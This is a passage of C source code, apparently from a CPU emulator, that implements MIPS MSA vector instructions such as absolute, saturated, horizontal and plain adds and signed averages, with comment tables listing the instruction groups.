Multiply and Subtr. (halfword) | * | MSUB_Q.W | Vector Fixed-Point Multiply and Subtr. (word) | * | MSUBR_Q.H | Vector Fixed-Point Multiply and Subtr. Rounded (halfword)| * | MSUBR_Q.W | Vector Fixed-Point Multiply and Subtr. Rounded (word) | * | MUL_Q.H | Vector Fixed-Point Multiply (halfword) | * | MUL_Q.W | Vector Fixed-Point Multiply (word) | * | MULR_Q.H | Vector Fixed-Point Multiply Rounded (halfword) | * | MULR_Q.W | Vector Fixed-Point Multiply Rounded (word) | * +---------------+----------------------------------------------------------+ */ /* TODO: insert Fixed Multiply group helpers here */ /* * Float Max Min * ------------- * * +---------------+----------------------------------------------------------+ * | FMAX_A.W | Vector Floating-Point Maximum (Absolute) (word) | * | FMAX_A.D | Vector Floating-Point Maximum (Absolute) (doubleword) | * | FMAX.W | Vector Floating-Point Maximum (word) | * | FMAX.D | Vector Floating-Point Maximum (doubleword) | * | FMIN_A.W | Vector Floating-Point Minimum (Absolute) (word) | * | FMIN_A.D | Vector Floating-Point Minimum (Absolute) (doubleword) | * | FMIN.W | Vector Floating-Point Minimum (word) | * | FMIN.D | Vector Floating-Point Minimum (doubleword) | * +---------------+----------------------------------------------------------+ */ /* TODO: insert Float Max Min group helpers here */ /* * Int Add * ------- * * +---------------+----------------------------------------------------------+ * | ADD_A.B | Vector Add Absolute Values (byte) | * | ADD_A.H | Vector Add Absolute Values (halfword) | * | ADD_A.W | Vector Add Absolute Values (word) | * | ADD_A.D | Vector Add Absolute Values (doubleword) | * | ADDS_A.B | Vector Signed Saturated Add (of Absolute) (byte) | * | ADDS_A.H | Vector Signed Saturated Add (of Absolute) (halfword) | * | ADDS_A.W | Vector Signed Saturated Add (of Absolute) (word) | * | ADDS_A.D | Vector Signed Saturated Add (of Absolute) (doubleword) | * | ADDS_S.B | Vector Signed Saturated Add (of Signed) (byte) | * | ADDS_S.H | Vector Signed Saturated Add (of Signed) (halfword) | * | ADDS_S.W | Vector Signed Saturated Add (of Signed) (word) | * | ADDS_S.D | Vector Signed Saturated Add (of Signed) (doubleword) | * | ADDS_U.B | Vector Unsigned Saturated Add (of Unsigned) (byte) | * | ADDS_U.H | Vector Unsigned Saturated Add (of Unsigned) (halfword) | * | ADDS_U.W | Vector Unsigned Saturated Add (of Unsigned) (word) | * | ADDS_U.D | Vector Unsigned Saturated Add (of Unsigned) (doubleword) | * | ADDV.B | Vector Add (byte) | * | ADDV.H | Vector Add (halfword) | * | ADDV.W | Vector Add (word) | * | ADDV.D | Vector Add (doubleword) | * | HADD_S.H | Vector Signed Horizontal Add (halfword) | * | HADD_S.W | Vector Signed Horizontal Add (word) | * | HADD_S.D | Vector Signed Horizontal Add (doubleword) | * | HADD_U.H | Vector Unigned Horizontal Add (halfword) | * | HADD_U.W | Vector Unigned Horizontal Add (word) | * | HADD_U.D | Vector Unigned Horizontal Add (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_add_a_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; return abs_arg1 + abs_arg2; } void helper_msa_add_a_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_add_a_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_add_a_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_add_a_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_add_a_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_add_a_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_add_a_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_add_a_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_add_a_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_add_a_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_add_a_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_add_a_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_add_a_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_add_a_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_add_a_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_add_a_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_add_a_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_add_a_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_add_a_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_add_a_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_add_a_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_add_a_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_add_a_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_add_a_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_add_a_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_add_a_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_add_a_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_add_a_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_add_a_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_add_a_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_add_a_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_add_a_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_add_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_add_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_adds_a_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t max_int = (uint64_t)DF_MAX_INT(df); uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; if (abs_arg1 > max_int || abs_arg2 > max_int) { return (int64_t)max_int; } else { return (abs_arg1 < max_int - abs_arg2) ? abs_arg1 + abs_arg2 : max_int; } } void helper_msa_adds_a_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_adds_a_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_adds_a_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_adds_a_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_adds_a_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_adds_a_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_adds_a_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_adds_a_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_adds_a_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_adds_a_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_adds_a_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_adds_a_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_adds_a_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_adds_a_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_adds_a_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_adds_a_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_adds_a_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_adds_a_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_adds_a_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_adds_a_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_adds_a_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_adds_a_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_adds_a_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_adds_a_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_adds_a_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_adds_a_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_adds_a_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_adds_a_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_adds_a_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_adds_a_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_adds_a_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_adds_a_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_adds_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_adds_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_adds_s_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t max_int = DF_MAX_INT(df); int64_t min_int = DF_MIN_INT(df); if (arg1 < 0) { return (min_int - arg1 < arg2) ? arg1 + arg2 : min_int; } else { return (arg2 < max_int - arg1) ? arg1 + arg2 : max_int; } } void helper_msa_adds_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_adds_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_adds_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_adds_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_adds_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_adds_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_adds_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_adds_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_adds_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_adds_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_adds_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_adds_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_adds_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_adds_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_adds_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_adds_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_adds_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_adds_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_adds_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_adds_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_adds_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_adds_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_adds_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_adds_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_adds_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_adds_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_adds_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_adds_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_adds_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_adds_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_adds_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_adds_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_adds_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_adds_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_adds_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t max_uint = DF_MAX_UINT(df); uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return (u_arg1 < max_uint - u_arg2) ? u_arg1 + u_arg2 : max_uint; } void helper_msa_adds_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_adds_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_adds_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_adds_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_adds_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_adds_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_adds_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_adds_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_adds_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_adds_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_adds_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_adds_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_adds_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_adds_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_adds_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_adds_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_adds_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_adds_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_adds_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_adds_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_adds_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_adds_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_adds_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_adds_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_adds_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_adds_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_adds_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_adds_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_adds_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_adds_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_adds_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_adds_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_adds_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_adds_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_addv_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 + arg2; } void helper_msa_addv_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_addv_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_addv_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_addv_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_addv_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_addv_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_addv_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_addv_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_addv_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_addv_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_addv_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_addv_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_addv_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_addv_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_addv_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_addv_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_addv_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_addv_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_addv_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_addv_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_addv_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_addv_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_addv_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_addv_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_addv_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_addv_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_addv_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_addv_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_addv_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_addv_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_addv_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_addv_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_addv_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_addv_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } #define SIGNED_EVEN(a, df) \ ((((int64_t)(a)) << (64 - DF_BITS(df) / 2)) >> (64 - DF_BITS(df) / 2)) #define UNSIGNED_EVEN(a, df) \ ((((uint64_t)(a)) << (64 - DF_BITS(df) / 2)) >> (64 - DF_BITS(df) / 2)) #define SIGNED_ODD(a, df) \ ((((int64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df) / 2)) #define UNSIGNED_ODD(a, df) \ ((((uint64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df) / 2)) static inline int64_t msa_hadd_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return SIGNED_ODD(arg1, df) + SIGNED_EVEN(arg2, df); } void helper_msa_hadd_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hadd_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hadd_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hadd_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hadd_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hadd_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hadd_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hadd_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hadd_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_hadd_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hadd_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hadd_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hadd_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hadd_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hadd_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hadd_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hadd_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_hadd_u_df(uint32_t df, int64_t arg1, int64_t arg2) { return UNSIGNED_ODD(arg1, df) + UNSIGNED_EVEN(arg2, df); } void helper_msa_hadd_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hadd_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hadd_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hadd_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hadd_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hadd_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hadd_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hadd_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hadd_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_hadd_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hadd_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hadd_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hadd_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hadd_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hadd_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hadd_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hadd_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Average * ----------- * * +---------------+----------------------------------------------------------+ * | AVE_S.B | Vector Signed Average (byte) | * | AVE_S.H | Vector Signed Average (halfword) | * | AVE_S.W | Vector Signed Average (word) | * | AVE_S.D | Vector Signed Average (doubleword) | * | AVE_U.B | Vector Unsigned Average (byte) | * | AVE_U.H | Vector Unsigned Average (halfword) | * | AVE_U.W | Vector Unsigned Average (word) | * | AVE_U.D | Vector Unsigned Average (doubleword) | * | AVER_S.B | Vector Signed Average Rounded (byte) | * | AVER_S.H | Vector Signed Average Rounded (halfword) | * | AVER_S.W | Vector Signed Average Rounded (word) | * | AVER_S.D | Vector Signed Average Rounded (doubleword) | * | AVER_U.B | Vector Unsigned Average Rounded (byte) | * | AVER_U.H | Vector Unsigned Average Rounded (halfword) | * | AVER_U.W | Vector Unsigned Average Rounded (word) | * | AVER_U.D | Vector Unsigned Average Rounded (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_ave_s_df(uint32_t df, int64_t arg1, int64_t arg2) { /* signed shift */ return (arg1 >> 1) + (arg2 >> 1) + (arg1 & arg2 & 1); } void helper_msa_ave_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_ave_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_ave_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_ave_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_ave_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_ave_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_ave_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_ave_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_ave_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_ave_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_ave_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_ave_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_ave_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_ave_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = 